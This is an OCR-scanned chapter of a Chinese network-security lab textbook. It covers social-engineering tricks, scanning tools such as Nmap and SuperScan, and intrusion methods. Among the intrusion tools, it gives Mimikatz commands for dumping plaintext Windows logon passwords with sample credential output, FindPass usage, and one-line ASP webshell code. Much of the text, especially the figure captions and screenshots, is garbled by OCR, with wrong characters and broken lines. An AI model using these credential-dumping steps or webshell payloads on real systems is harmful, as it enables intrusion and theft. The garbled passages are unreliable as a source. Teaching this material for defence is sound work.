信息 只 有 及 时 、 迅 速 地 提供 给 它 的 使 用 者 才能 有 效 地 发 挥 作用 。 

信息 收集 手段 有 以 下 三 种 。 

CD 合法 途径 : 从 目标 机 构 的 网 站 新 闻 报 道 .出 版 物 .新 闻 组 或 论坛 获取 。 

(2) 社会 工程 手段 : 假冒 他 人 ,获取 第 三 方 的 信任 。 

(3) 搜索 引擎 : 搜索 引擎 是 自动 从 Internet 收集 信息 ,经 过 一 定 整理 以 后 ,提供 给 用 户 
进行 查询 的 系统 ,包括 信息 搜集 、 信 息 整 理 和 用 户 查询 三 部 分 。 


6.4.2 社会 工程 学 的 攻击 


社会 工程 是 使 用 计谋 和 假 情 报 去 获得 密码 和 其 他 敏感 信息 的 科学 ,研究 一 个 站 点 的 策 
略 其 中 之 一 就 是 尽 可 能 多 地 了 解 这 个 组 织 的 个 体 , 因 此 黑客 不 断 试图 寻找 更 加 精妙 的 方法 
从 他 们 和 希望 渗透 的 组 织 那里 获得 信息 。 

举 个 例子 : 一 组 高 中 学 生 曾经 想 要 进入 一 个 当地 公司 的 计算 机 网 络 ,他们 拟定 了 一 个 
表格 ,调查 看 上 去 显得 是 无 害 的 个 人 信息 ,例如 所 有 秘书 和 行政 人 员 和 他 们 的 配偶 、 孩 子 的 
名 字 , 这 些 从 学 生 转 变 成 的 黑客 说 这 种 简单 的 调查 是 他 们 社会 研究 工作 的 一 部 分 。 利 用 这 
份 表 格 这 些 学 生 能 够 快速 地 进入 系统 ,因为 网 络 上 的 大 多 数 人 是 使 用 宠物 和 他 们 的 配偶 名 
字 作为 密码 。 

目前 社会 工程 学 攻击 主要 包括 两 种 方式 : 打 电 话 请 求 密码 和 伪造 E-mail。 

CD 打 电 话 请 求 密码 : 打 电 话 询问 密码 也 经 常 奏效 。 在 社会 工程 中 那些 黑客 冒充 失去 
密码 的 合法 雇员 ,经 常 通过 这 种 简单 的 方法 重新 获得 密码 。 

(2) 伪造 E-mail: 使 用 Telnet, 一 个 黑客 可 以 截取 任何 一 个 身份 发 送 E-mail 的 全 部 信 
息 , 这 样 的 E-mail 消息 是 真 的 ,因为 它 发 自 于 一 个 合法 的 用 户 ,在 这 种 情形 下 ,这 些 信息 显 
然 是 真实 的 。 黑 客 可 以 伪造 这 些 。 一 个 冒充 系统 管理 员 或 经 理 的 黑客 就 能 较为 轻松 地 获得 
大 量 的 信息 ,黑客 就 能 实施 他 们 的 恶意 阴谋 。 

具体 实施 的 方法 有 以 下 几 种 。 

1. 十 度 分 隔 法 

利用 电话 进行 欺诈 的 一 位 社会 工程 学 黑客 的 首要 任务 ,就 是 要 让 他 的 攻击 对 象 相信 ,他 
要 么 是 一 位 同事 ,要 么 是 一 位 可 信赖 的 专家 (比如 执法 人 员 或 者 审核 人 员 )。 但 如 果 他 的 目 
标 是 要 从 员工 X 处 获取 信息 的 话 ,那么 他 的 第 一 个 电话 或 者 第 一 封 邮件 并 不 会 直接 打 给 或 
AX. 

2. 学 会 说 行 话 

每 个 行业 都 有 自己 的 缩写 术语 ,而 社会 工程 学 黑客 就 会 研究 攻击 对 象 所 在 行业 的 术语 ， 
以 便 能 够 在 与 攻击 对 象 接 触 时 卖弄 这 些 术 语 , 以 博得 好 感 。 这 其 实 就 是 一 种 环境 提示 ,假如 
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我 跟 你 讲话 ,用 你 熟悉 的 话语 来 讲 ,你 当然 就 会 信任 我 。 要 是 我 还 能 使 用 你 经 常 使 用 的 缩写 
词汇 和 术 请 的话 , 那 你 就 会 更 愿意 向 我 透露 信息 。 

3. 借用 目标 企业 的 “等 待 音乐 ” 

另外 一 种 成 功 的 技巧 是 记录 某 家 公司 所 播放 的 “等 待 音乐 ”, 也 就 是 接 电话 的 人 尚未 接 
通 时 播放 的 等 待 乐曲 。 犯 罪 分 子 会 有 意 拨 通 电话 , 录 下 等 待 音乐 ,然后 加 以 利用 。 比 如 当 他 
打 给 某 个 目标 对 象 时 ,他 会 谈 上 一 分 钟 然后 说 : 抱歉 ,我 的 另 一 部 电话 响 了 ,请 别 挂 断 ,这 
时 ,受害 人 就 会 听 到 很 熟悉 的 公司 定制 的 等 待 音乐 ,此 人 肯定 就 在 本 公司 工作 。 这 是 我 们 的 
音乐 ,这 不 过 是 又 一 种 心理 暗示 而 已 。 

4. 电话 号 码 欺诈 

犯罪 分 子 常常 会 利用 电话 号 码 欺 诈 术 , 也 就 是 在 目标 被 叫 者 的 来 电 显示 屏 上 显示 一 个 
和 主 叫 号 码 不 一 样 的 号 码 。 犯 罪 分 子 可 能 是 从 某 个 公寓 给 你 打 的 电话 ,但 是 显示 在 你 的 电 
话 上 的 来 电 号 码 却 可 能 会 让 你 觉得 好 像 是 来 自 同一 家 公司 的 号 码 , 于 是 ,你 就 有 可 能 轻 而 易 
举 地 上 当 , 把 一 些 私 人 信息 ,比如 口令 等 告诉 对 方 。 而 且 , 犯 罪 分 子 还 不 容易 被 发 现 ,因为 如 
果 回 拨 过 去 时 ,可 能 拨 的 是 企业 自己 的 一 个 号 码 。 

5. 利用 坏 消息 作案 

只 要 报纸 上 已 刊登 什么 坏 消息 , 坏 分 子 们 就 会 利用 其 来 发 送 社会 工程 学 式 的 垃圾 邮件 、 
网 络 钓鱼 或 其 他 类 型 的 邮件 ,从 美国 的 经 济 危 机 中 可 以 看 到 此 类 活动 的 增多 趋势 ,有 大 量 的 
网 络 钓鱼 攻击 是 和 银行 间 的 并 购 有 关 的 ,钓鱼 邮件 会 告诉 你 说 ,你 的 存款 银行 已 被 他 们 的 银 
行 并 购 了 。 请 你 点 击 此 处 以 确保 能 够 在 该 银行 关 张 之 前 修改 你 的 信息 。 这 是 诱骗 你 泄漏 自 
己 的 信息 ,他 们 便 能 够 进入 你 的 账户 窃取 钱财 ,或 者 倒卖 储户 的 信息 。 

6. 滥用 网 民 对 社交 网 站 的 信任 

Facebook, MySpace 和 LinkedIn 都 是 非常 受 欢 迎 的 社交 网 站 。 很 多 人 对 这 些 网 站 十 分 
信任 。 已 经 有 越 来 越 多 的 社交 网 站 迷 们 收 到 了 自称 是 Facebook 网 站 的 假冒 邮件 ,结果 上 了 
当 。 用 户 们 会 收 到 一 封 邮 件 称 : 本 站 正在 进行 维护 ,请 在 此 输入 信息 以 便 升级 之 用 。 只 要 
点 进去 ,就 会 被 链接 到 钓鱼 网 站 上 去 。 请 大 家 记 住 ,很 少 有 某 个 网 站 会 寄 发 要 求 输入 更 改口 
令 或 进行 账户 升级 的 邮件 。 

7. 输入 错误 捕获 法 

犯罪 分 子 还 常常 会 利用 人 们 在 输入 网 址 时 的 错误 来 作案 ,比如 当 你 输入 一 个 网 址 时 ,党 
常会 输 错 一 两 个 字母 ,结果 转眼 间 你 就 会 被 链接 到 其 他 网 站 上 去 ,产生 了 意 想不到 的 结果 。 
坏 分 子 们 早 就 研究 透 了 各 种 常见 的 拼写 错误 ,而 他 们 的 网 站 地 址 就 常常 使 用 这 些 可 能 拼 错 
的 字母 来 作 域名 。 

8. 利用 FUD 操纵 股市 

一 些 产品 的 安全 漏洞 ,甚至 整个 企业 的 一 些 漏 洞 都 会 被 利用 来 影响 股市 。 例 如 ,微软 产 
品 的 一 些 关 键 性 漏洞 就 会 对 其 股价 产生 影响 ,每 一 次 有 重要 的 漏洞 信息 被 公布 ,微软 的 股价 
就 会 出 现 反复 的 波动 。 另 有 一 个 例子 表明 ,还 有 人 故意 传播 斯 蒂 夫 。 乔布斯 的 死讯 ,结果 导 
致 苹果 的 股价 大 跌 。 这 是 一 个 利用 了 FUDGE DE .不 确定 、 怀 疑 ) ,从 而 对 股价 产生 作用 的 明 
显 事例 。 
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6.5 A 描 


扫描 的 目的 就 是 探 察 对 方 的 各 方面 情况 ,确定 攻击 的 时 机 , 摸 清 对 方 最 薄弱 的 环节 和 守 
散 的 时 刻 ,为 下 一 步 的 入 侵 提 供 良 好 的 策略 。 扫 描 的 工具 软件 有 Mimikatz, Nmap, 
Superdic( 超 级 字典 文件 生成 器 ) , Shed, X-Scan, SuperScan 等 。 


1. Mimikatz 2. 0 


Mimikatz 是 法 国人 Gentil Kiwi 编写 的 一 款 Windows 平台 下 的 神器 , 它 具 备 很 多 功 
能 ,其 中 最 引 人 注 目的 功能 是 直接 从 lsass. exe 进程 里 获取 Windows 处 于 active 状态 账号 
的 明文 密码 。 但 对 Windows 10 无 效 ,其 他 Windows 系统 都 有 效 。 

Mimikatz 的 功能 不 仅 如 此 , 它 还 可 以 提升 进程 权限 ,注入 进程 , 读 取 进 程 内 存 等 。 
Mimikatz 包含 很 多 本 地 模块 ,更 像 是 一 个 轻 量 级 的 调试 器 ,其 强大 的 功能 还 有 待 挖掘 。 

是 示 : Windows 7 以 上 的 不 是 系统 管理 员 身份 的 需要 用 管理 员 权 限 运 行 ,不 


错误 。 
该 软件 使 用 简单 ,只 用 以 下 两 条 命令 
第 一 条 : privilege::debug // 提 升 权 限 
第 二 条 : sekurlsa::logonpasswords // 抓 取 密 码 


查看 相应 的 结果 ,如 图 6-5 所 示 , 具 体 使 用 步骤 见 实验 15. 


[TREECTEEOTC 
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6-5 Mimikatz 运行 结果 


2. Superdic( 超 级 字典 文件 生成 器 ) 
用 自己 定义 的 密码 字典 ,用 户 需要 把 攻击 对 象 认为 可 能 是 的 密码 都 写 和 人 密码 字典 ,即使 
这 样 也 可 能 写 不 完全 ,所 以 可 以 使 用 超级 字典 文件 生成 器 生成 密码 。Superdic 就 是 一 个 密 
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码 生 成 工具 , 见 图 6-6。 在 破解 密码 时 用 来 穷尽 选择 的 字符 组 成 的 所 有 密码 , 见 图 6-7。 而 
只 有 当 字 典 中 包含 潜在 账号 /密码 时 才 有 可 能 破解 成 功 。 具 体 使 用 步骤 见 实 验 16 。 


名 易 优 软件 一 超级 字典 生成 各 3- 35 
关于 | 基本 字符 | 自 定义 | 生日 “| 生成 字典 | 修改 字典 | 注册 | 


易 忧 超级 宇 典 生成 器 七 大 功能 : 
1. 程序 采用 高 度 优化 算法 ,制作 字典 速度 极 快 
JE EST 


|vilv2is3ivalsivelvtiiva8ies 

| WaAlvsivcivnivEvrivcivuivi 
ivxivovriaimnis 
iexivrivz 
lvaiveivet£iveivhivi 
ivnivolvpivalvrivs 


图 6-7 选择 的 字符 


3. Shed 共享 目录 扫描 

写 上 要 扫描 对 方 主机 的 地 址 段 ,得 到 对 方 计 算 机 提供 了 哪些 目录 共享 。 通 常 有 用 的 共 
享有 两 种 ,一 种 就 是 人 们 常 说 的 共享 。Windows 的 文件 打印 共享 ,双击 后 如 果 跳 出 对 话 框 
提示 输入 密码 ,不 知道 密码 就 进 不 去 ,但 很 多 时 候 都 能 直接 进去 ,特别 是 一 些 单位 或 网 吧 的 
共享 主机 。 例 如 ,可 以 扫 到 一 家 网 吧 的 E 盘 .速度 很 快 , 可 以 看 电影 。 另 一 种 共享 就 是 NT 
的 默认 共享 ,及 c$ 、d$ ,ipc$ ,admin$ 等 。 这 种 共享 需要 管理 员 权 限 ,通常 对 个 人 主机 输 
入 用 户 名 administrator, 密 码 为 空 , 成 功 的 希望 很 大 。 工具 软件 的 主 界面 如 图 6-8 所 示 , 具 
体 使 用 步骤 见 实验 17。 
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S Shed 1.01 http://keir. net 


192 .168 . 1 1 
$E IP: [192 .168. 1 .255 — 


发 现 的 共享 资源 : B> 3C 验证 扫描 : 
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图 6-8 Shed 共享 目录 扫描 


4. Nmap 网 络 扫描 和 嗅 探 工具 

Nmap( 网 络 映射 器 ) 是 由 Gordon Lyon 设计 ,用 来 探测 计算 机 网 络 上 的 主机 和 服务 的 
一 种 安全 扫 撒 器 。 为 了 绘制 网 络 拓扑 图 ,Nmap 发送 特制 的 数据 包 到 目标 主机 ,然后 对 返回 
的 数据 包 进 行 分 析 。Nmap 是 一 款 枚 举 和 测试 网 络 的 强大 工具 。 通 过 该 工具 可 以 扫描 常用 
的 端口 和 指定 的 端口 是 否 开放 , 见 图 6-9. 


全 Zenmap 一 口 x 

AEO IAD NB) 帮助 (H) 

目标 | [X] æE: [intense scan [v] Es] 5359] 

命令 : [nmap -T4 -A v | 

memi 主机 < | NH: EH 

过 机 
图 6-9 Nmap 扫描 端口 软件 
Nmap 特点 如 下 。 
CD 主机 探测 : 探测 网 络 上 的 主机 ,例如 , 列 出 响应 TCP 和 ICMP 请 求 icmp 请 求 、 开 
放 特 别 端口 的 主机 。 


(2) 端口 扫描 : 探测 目标 主机 所 开放 的 端口 。 
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(3) 版 本 检测 : 探测 目标 主机 的 网 络 服务 ,判断 其 服务 名 称 及 版 本 号 。 

(4) 系统 检测 : 探测 目标 主机 的 操作 系统 及 网 络 设备 的 硬件 特性 。 

(5) 支持 探测 脚本 的 编写 : 使 用 Nmap 的 脚本 引擎 (NSE) 和 Lua 编程 语言 。 

Nmap 能 扫描 出 目标 的 详细 信息 包括 DNS 反 解 .设备 类 型 和 MAC 地 址 。 

Nmap 是 一 个 网 络 探 测 和 安全 扫描 程序 ,系统 管理 者 和 个 人 可 以 使 用 这 个 软件 扫描 大 
型 的 网 络 , 获 取 被 扫描 主机 正在 运行 以 及 提供 什么 服务 等 信息 。Nmap 支持 很 多 扫描 技术 ， 
如 UDP, TCP connect (O, TCP SYN CEF H Hi), FTP 代理 (bounce 攻击 )、 反 向 标志 、 
ICMP, FIN, ACK Hfi ZER (Xmas Tree), SYN 扫描 和 null 扫描 。NMAP 还 提供 了 一 
些 高 级 的 特征 ,例如 ,通过 TCP/IP 协议 栈 特 征 探测 操作 系统 类 型 ,秘密 扫描 ,动态 延 时 和 重 
传 计算 ,并行 扫描 ,通过 并 行 ping 扫描 探测 关闭 的 主机 ,诱饵 扫描 , 避 开 端口 过 滤 检 测 ,直接 
RPC 扫描 (无 须 端 口 影 射 ) ,碎片 扫描 ,以 及 灵活 的 目标 和 端口 设 定 。 具 体 使 用 步骤 请 参考 
实验 18. 

以 下 列 出 9 条 常用 Nmap 命令 行 格式 。 

1) 获取 远程 主机 的 系统 类 型 及 开放 端口 

nmap -sS -P0 -sV -0< target> 

这 里 的 < target > 可 以 是 单一 IP, 或 主机 名 ,或 域名 ,或 子 网 。 

- sS TCP SYN 扫描 (又 称 半 开放 ,或 隐身 扫描 ) 

-PO 允许 关闭 ICMP pings, 

- sV 打开 系统 版 本 检测 。 

-0 尝试 识别 远程 操作 系统 。 


2) 列 出 开放 了 指定 端口 的 主机 列表 

nmap -sT -p80 -oG - 192.168.1. * | grep open 
30 在 网 络 中 寻找 所 有 在 线 主机 

nmap 一 SP 192.168.0. * 

或 者 也 可 使 用 以 下 命令 : 

nmap — sP 192.168.0.0/24 

4) ping 指定 范围 内 的 IP 地 址 

nmap - sP 192.168.1.100 - 254 

5) 在 某 段 子 网 上 查找 未 占用 的 IP 

nmap 一 ?4 - sP 192.168.2.0/24 && egrep "00:00:00:00:00:00" /proc/net/arp 
6) 在 局 域 网 上 扫描 Conficker 蠕虫 病毒 


nmap -PN - T4 - p139,445 -n - v - script = smb - check - vulns - script - args safe=1 
192.168.0.1- 254 


7) 扫描 网 络 上 的 恶意 接 人 点 rogue APs 


nmap -A -p1 - 85, 113, 443, 8080 - 8100 - T4 - min- hostgroup 50 - max- rtt- timeout 2000 
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— initial- rtt- timeout 300 - max- retries 3 - host- timeout 20m - max- scan- delay 1000 - 
oA wapscan 10. 0. 0. 0/8 


D 使 用 诱饵 扫描 方法 来 扫描 主机 端口 


sudo nmap - sS 192.168.0.10 -D192.168.0.2 
9) 显示 网 络 上 共有 多 少 台 Linux 及 Windows 设备 


sudo nmap -了 -0192.168.1.1-255 | grep "Running: " > /tmp/os; echo " $ (cat /tmp/os | grep 
Linux | wc - 1) Linux device(s)"; echo " $ (cat /tmp/os | grep Windows | wc - 1) Window(s) 
devices" 


5. 漏洞 扫描 X-Scan-V3.3 

采用 多 线程 方式 对 指定 IP 地 址 段 (或 单机 ) 进 行 安 全 漏洞 检测 ,支持 插件 功能 ,提供 了 
图 形 界面 和 命令 行 两 种 操作 方式 ,扫描 内 容 包括 : 远程 操作 系统 类 型 及 版 本 ,标准 端口 状态 
及 端口 BANNER 信息 ,CGI 漏洞 ,IIS 漏洞 .RPC 漏洞 ,SQL Server, FTP Server, SMTP 
Server, POP3 Server, NT Server 弱 口 令 用 户 ,NT 服务 器 NetBIOS 信息 等 ,如 图 6-10 所 示 。 
扫描 结果 保存 在 /log/ 目 录 中 ,index_*. htm 为 扫描 结果 索引 文件 ,扫描 结果 如 图 6-11 所 
示 。 具 体 使 用 步骤 见 实验 19. 
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lapsi] 


Æ 6-10 X-Scan 扫描 的 设置 


6. 网 络 监听 

网 络 监听 是 一 种 监视 网 络 状 态 .数据 流程 以 及 网 络 上 信息 传输 的 管理 工具 , 它 可 以 将 网 
络 界面 设 定 成 监听 模式 ,并 且 可 以 截获 网 络 上 所 传输 的 信息 。 也 就 是 说 , 当 黑 客 登 录 网 络 主 
机 并 取得 超级 用 户 权限 后 , 若 要 登录 其 他 主机 ,使 用 网 络 监 听 便 可 以 有 效 地 截获 网 络 上 的 数 
据 , 这 是 黑客 使 用 最 好 的 方法 。 但 是 网 络 监听 只 能 应 用 于 连接 同一 网 段 的 主机 ,通常 被 用 来 
获取 用 户 密码 等 。 

网 络 监听 的 工具 有 很 多 ,如 前 面 讲 过 的 Sniffer、Wireshark 等 。 下 面 是 一 款 可 以 运行 在 
Windows 2003. Windows XP. Windows 2000. Vista. Windows 7 上 的 网 络 监听 工具 ,是 让 
用 户 查看 自己 当前 正在 访问 哪些 网 络 资源 .或 者 查看 哪些 人 在 攻击 本 台 计 算 机 的 工具 ,软件 
界面 整洁 ,一 切 信息 一 目 了 然 , 见 图 6-12。 
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图 6-11 扫描 的 结果 
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图 6-12 网 络 监听 工具 界面 
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7. SuperScan 端口 扫描 器 

打开 主 界面 ,默认 为 扫描 (Scan) 菜 单 ,允许 输入 一 个 或 多 个 主机 名 或 IP 范围 ,也 可 以 选 
择 文件 下 的 输入 地 址 列表 。 输 入 主机 名 或 IP 范围 后 开始 扫描 , 单 击 Play 按钮 ,SuperScan 
开始 扫描 地 址 。 扫 描 进程 结束 后 ,SuperScan 将 提供 一 个 主机 列表 , 列 出 关于 每 台 扫 描 过 的 
主机 被 发 现 的 开放 端口 信息 。SuperScan 还 有 选择 以 HTML 格式 显示 信息 的 功能 , 见 图 6-13， 
具体 使 用 步骤 见 实 验 20。 


[— Helper apps in ngh-clck menu —— 
FTP [CwogasFieAGkbeSCAP 5] 
Paama [orraa 

Tut forme — à — — $5] 
Pam [uxo ——— — — — 
Web. [CvPropm Fiesa pt > | 
Paama [pv 如 


Paraat: Xa = IP addess. Xp = pot 


图 6-13 SuperScan 扫描 界面 


SuperScan 具有 以 下 功能 。 

CD 通过 ping 来 检验 IP 是 否 在 线 ; 

(2) IP 和 域名 相互 转换 ; 

(3) 检验 目标 计算 机 提供 的 服务 类 别 ; 

(4) 检验 一 定 范围 目标 计算 机 是 否 在 线 和 端口 情况 ; 

CO 工具 自 定 义 列表 检验 目标 计算 机 是 否 在 线 和 端口 情况 ; 

(6) 自 定义 要 检验 的 端口 ,并 可 以 保存 为 端口 列表 文件 ; 

CD 软件 自 带 一 个 木马 端口 列表 trojans. lst, 通 过 这 个 列表 可 以 检测 目标 计算 机 是 否 
有 木马 ; 同时 ,也 可 以 自己 定义 修改 这 个 木马 端口 列表 。 


6.6 网 络 人 侵 


6.6.1 网 络 入 侵 行为 分 析 


网 络 人 侵 威 胁 归 类 来 源 主要 分 为 以 下 三 大 类 。 
CD 物理 访问 : 指 非 法 用 户 能 接触 机 器 , 坐 在 了 计算 机 面前 ,可 以 直接 控制 终端 乃至 整 
个 系统 。 
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(2) 局 域 网 内 用 户 威胁 : 一 般 指 局 域 网 内 用 户 , 具 有 了 一 般 权 限 后 对 主机 进行 非法 
访问 。 
(3) 远程 人 侵 : 外 部 人 员 在 通过 Internet 或 者 拨号 的 方式 远程 非法 访问 主机 。 


6.6.2 网 络 入 侵 方法 


网 络 入 侵 的 方法 有 很 多 ,归纳 起 来 有 以 下 18 种 方法 。 

1. 拒绝 访问 

这 已 经 成 为 一 个 很 常见 的 网 络 恶作剧 。 进 攻 者 用 大 量 的 请 求 信息 冲击 网 站 ,从 而 有 效 
地 阻塞 系统 ,使 运行 速度 变 慢 ,甚至 网 站 崩溃 。 这 种 使 计算 机 过 载 的 方法 常常 被 用 来 掩盖 对 
网 站 的 入 侵 。 

2. 扫描 器 

通过 广泛 地 扫描 Internet 来 确定 计算 机 、 服 务 器 和 连接 的 类 型 。 恶 意 的 人 常常 利用 这 
种 方法 来 找到 计算 机 和 软件 的 薄弱 环节 并 加 以 利用 。 

3. 嗅觉 器 

这 种 软件 暗中 搜寻 正在 网 上 传输 的 个 人 网 络 信息 包 , 可 以 用 来 获取 密码 甚至 整个 信息 
包 的 内 容 。 

4. 网 上 欺骗 

伪造 电子 邮件 ,用 它们 哄骗 用 户 输入 关键 信息 ,如 邮箱 账号 .个 人 密码 或 信用 卡 等 。 

5. 特洛伊 木马 

这 种 程序 包含 探测 一 些 软件 弱点 所 在 的 指令 ,安装 在 计算 机 上 ,用 户 一 般 很 难 察觉 。 

6. 后 门 

黑客 为 了 防止 原来 进入 的 通道 被 察觉 ,开发 一 些 隐蔽 的 进入 通道 (俗称 “后 门 ”) ,使 重新 
进入 变 得 容易 ,这 些 通 道 是 难以 被 发 现 的 。 

7. 恶意 小 程序 

这 是 一 种 微型 程序 ,有 时 用 Java 语言 写成 , 它 能 够 滥用 计算 机 资源 ,修改 硬盘 上 的 文 
件 ,发 出 伪造 的 电子 邮件 以 及 偷窃 密码 。 

8. 进攻 拨号 程序 

这 种 程序 能 够 自动 拨 出 成 千 上 万 个 电话 号 码 ,用 来 搜寻 一 个 通过 调制 解 调 器 连接 的 进 
入 通道 。 

9. 逻辑 炸弹 

这 是 嵌入 计算 机 软件 中 的 一 种 指令 , 它 能 够 触发 对 计算 机 的 恶意 操作 (没有 什么 实际 功 
能 ,一 般 是 在 正常 文件 里 ) 。 

10. 密码 破解 

入 侵 者 破解 系统 的 登录 或 管理 密码 及 其 他 一 些 关 键 口令 (密码 难度 加 强 , 建 议 设置 18 
位 的 混合 密码 ) 。 
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11. 社交 工程 

这 种 策略 是 通过 与 没有 戒心 的 公司 雇员 交谈 ,从 中 得 到 有 价值 的 信息 ,从 而 获得 或 猜 出 
对 方 网 络 的 漏洞 (如 猜 出 密码 ) ,进而 控制 公司 计算 机 系统 (社交 工程 属于 人 为 行为 ,一 定 不 
SERO. 

12. 垃圾 搜寻 

通过 对 一 家 公司 垃圾 的 搜寻 和 分 析 , 获 得 有 助 于 阁 人 这 家 公司 计算 机 系统 的 有 用 信息 。 
这 些 信 息 常常 被 用 来 证 实在 “社交 工程 中 刺探 到 的 信息 。 

13. 系统 漏洞 

这 是 很 实用 的 攻击 方式 。 入 侵 者 利用 操作 系统 漏洞 ,可 以 很 轻易 地 进入 系统 主机 并 获 
取 整 个 系统 的 控制 权 ( 建 议 使 用 正版 系统 ,定时 更 新 和 修补 漏洞 ) 。 

14. 应 用 程序 漏洞 

与 上 述 系统 漏洞 的 方式 相似 ,也 可 能 获取 整个 系统 的 控制 权 。 

15. 配置 漏洞 

通常 指 系统 管理 员 本 身 的 错误 。 

16. 协议 /设计 漏洞 

指 通信 协议 或 网 络 设计 本 身 存 在 的 漏洞 ,如 Internet 上 广泛 使 用 的 基本 通信 协议 
TCP/IP, 本 身 设计 时 就 存在 一 些 缺 陷 ( 建 议 不 要 使 用 Internet, 使 用 其 他 通信 软件 ) 。 

17. 身份 欺骗 

包括 用 户 身 份 欺骗 和 IP 地 址 欺骗 ,以 及 硬件 地 址 欺骗 和 软件 地 址 欺骗 。 通 过 适当 的 安 
全 策略 和 配置 可 以 防止 这 种 攻击 。 

18. 炸弹 

这 是 利用 系统 或 程序 的 小 毛病 ,对 目标 发 送 大 量 洪水 般 的 报 文 ,或 者 非法 的 会 引起 
系统 出 错 的 数据 包 等 ,导致 系统 或 服务 停止 响应 、 死 机 其 至 重启 系统 的 攻击 。 这 种 方式 
是 最 简单 但 却 是 最 有 效 的 一 种 攻击 方式 。 最 近 黑 客 们 攻击 美国 的 各 大 网 站 就 是 用 的 这 
种 方法 。 


6.7 网 络 人 侵 的 工具 


6.7.1 FindPass 得 到 管理 员 密 码 


用 户 登 录 以 后 ,所 有 的 用 户 信 息 都 存储 在 系统 的 一 个 进程 中 ,这 个 进程 是 winlogon. 
exe, 可 以 利用 程序 将 当前 登录 用 户 的 密码 解码 出 来 ,如 图 6-14 所 示 。 

使 用 FindPass 等 工具 可 以 对 该 进程 进行 解码 ,然后 将 当前 用 户 的 密码 显示 出 来 ,如 
图 6-15 所 示 , 具 体 使 用 步骤 参见 实验 21。 


120 计算 机 网 络 安全 与 实验 教程 (第 二 版 ) 


E windows 任务 管理 器 -ioj x 
文件 (E) 选项 (0) SEW EWH 
应 用 程序 进程 | 性 能 | 


System Idle P 
Systen 


E 
S 


services. exe 
lsass. exe 
svchost. exe 
spoolsv. exe 
msdtc. exe 
tepsves. exe 
svchost. exe 
llssrv. exe 
regsvc. exe 
MSTask. exe 
termsrv. exe 
VilwareService.e 
wins. exe 


ce 。 asa 


T 显示 所 有 用 户 的 进程 &) 


388888888888888 
8858888558888880 8 2| 
88888888888582 RRE : 


3 
B 


EER: 26 [cpu 使用: 4% 内 存 使 用 : 73132K 1310924K — 7 
图 6-14 任务 管理 器 winlogon 程序 


:N?PindPass .exe 


To Pind Password in the Winlogon process 
Usage: FindPass.exe DomainName UserName PID-of-WinLogon 


debug privilege has been added to PassuordReninder. 
MinLogon process id is 192 《BxB8BB8BcB>- 


find HACKERwadministrator password in process 192 ... 


encoded password is found at 0x009a0808 and has a length of 6. 
logon information is: |HRCKER/administrator/123456. 


hash byte is: 8x68. 
主机 名 /登录 名 ER 
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6.7.2 Mimikatz 破解 登录 密码 


利用 6. 5 节 介 绍 的 工具 软件 Mimikatz 也 可 以 将 管理 员 密 码 破 解 出 来 ,密码 为 数字 或 者 
是 数字 和 字符 的 混合 , 均 可 以 破解 出 来 ,如 图 6-16 所 示 。 


6.7.3 Metasploit 安全 漏洞 检测 工具 


开源 软件 Metasploit 是 H. D. Moore 在 2003 年 开发 的 , 它 是 少数 几 个 可 用 于 执行 诸多 
渗透 测试 步骤 的 工具 。 在 发 现 新 漏洞 时 (这 是 很 常见 的 ), Metasploit 会 监控 Rapid7, 然 后 
Metasploit 的 20 多 万 个 用 户 会 将 漏洞 添加 到 Metasploit 的 目录 上 。 然 后 ,任何 人 只 要 使 用 
Metasploit ,就 可 以 用 它 来 测试 特定 系统 是 否 有 这 个 漏洞 。 

Metasploit 框架 使 Metasploit 具有 和 良好 的 可 扩展 性 , 它 的 控制 接口 负责 发 现 漏洞 ,攻击 


iminikatz # sekurlsa::logonpassuords 


fluthentication Id : 3 192847 heii 
on zd t tii "on 


: Ei " E 21-1721293517-2743261148-798124821-5800 


"gaeeeez1 Prinary 

x Usernane : Administrator 
: VANGFU 
: 1319b8fa23c89f2dff17365faf1ffe89 

: 8a640404b5c386ab12092587fei9cd82 

: clc5df7?68d2547d43e891hbed7c498177589788726 


: fidninistrator 
Mrs) 
queri234 


: Administrator 
: WANGPW 
: queri234 
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漏洞 ,提交 漏洞 ,然后 通过 一 些 接口 加 入 攻击 后 处 理工 具 和 报表 工具 。Metasploit 框架 可 以 
从 一 个 漏洞 扫描 程序 导入 数据 ,使 用 关于 有 漏洞 主机 的 详细 信息 来 发 现 可 攻击 漏洞 ,然后 使 
用 有 效 载荷 对 系统 发 起 攻击 。 所 有 这 些 操作 都 可 以 通过 Metasploit 的 Web 界面 进行 管理 ， 
而 它 只 是 其 中 一 种 管理 接口 , 男 外 还 有 命令 行 工具 和 一 些 商 业 工 具 等 。 

攻击 者 可 以 将 漏洞 扫描 程序 的 结 果 - 入 到 Metasploit 框架 的 开 " 安全 工具 Armitage 
- 旦 发 现 了 漏洞 , 攻 击 者 就 可 以 采取 一 种 可 行 
统 ， 通过 Shell 或 启动 Metasploit 的 meterpreter 来 控制 这 个 系统 。 

这 些 有 效 载荷 就 是 在 获得 本 地 系统 访问 之 后 执行 的 一 系列 命令 。 这 个 过 程 需要 参考 一 
些 文档 并 使 用 一 些 数据 库 技 术 ,在 发 现 漏洞 之 后 开发 一 种 可 行 的 攻击 方法 。 其 中 ,有 效 载 荷 
数据 库 包含 用 于 提取 本 地 系统 密码 .安装 其 他 软件 或 控制 硬件 等 的 模块 ,这 些 功 能 很 像 以 前 
BO2K 等 工具 所 具备 的 功能 。Metasploit 工具 的 详细 使 用 请 参阅 实验 22 。 


6.7.4 中 国 菜刀 


中 国 菜刀 是 一 款 专业 的 网 站 管理 软件 ,用 途 广泛 ,使 用 方便 ,小 巧 实用 。 只 要 支持 动态 
脚本 的 网 站 ,都 可 以 用 中 国 菜刀 来 进行 管理 。 在 非 简体 中 文 环境 下 使 用 ,自动 切换 到 英文 界 
面 。Uincode 方式 编译 ,支持 多 国语 言 输入 显示 。 中 国 菜 刀 工 具 的 详细 使 用 请 参阅 实验 36、 
实验 37。 


6.7.5 一 句 话 木马 


- 句 话 木马 短小 精 悍 ,而 且 功能 强大 ,隐蔽 性 非常 好 ,在 入 侵 中 始终 产生 着 强大 的 作用 。 
黑客 在 注册 信息 的 电子 邮箱 或 者 个 人 主页 等 中 插入 类 似 如 下 代码 : 


<% execute request("value") %> 

其 中 ,value 是 值 ,所 以 可 以 更 改 为 自己 的 值 ,前 面 的 request 就 是 获取 这 个 值 。 

— eval request("value")% 记 (现在 比较 多 见 的 ,而 且 字 符 少 , 对 表单 字数 有 限制 的 地 
方 特别 实用 ) 
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当知 道 了 数据 库 的 URL ,就 可 以 利用 本 地 一 张 网 页 进行 连接 得 到 Webshell。( 不 知道 
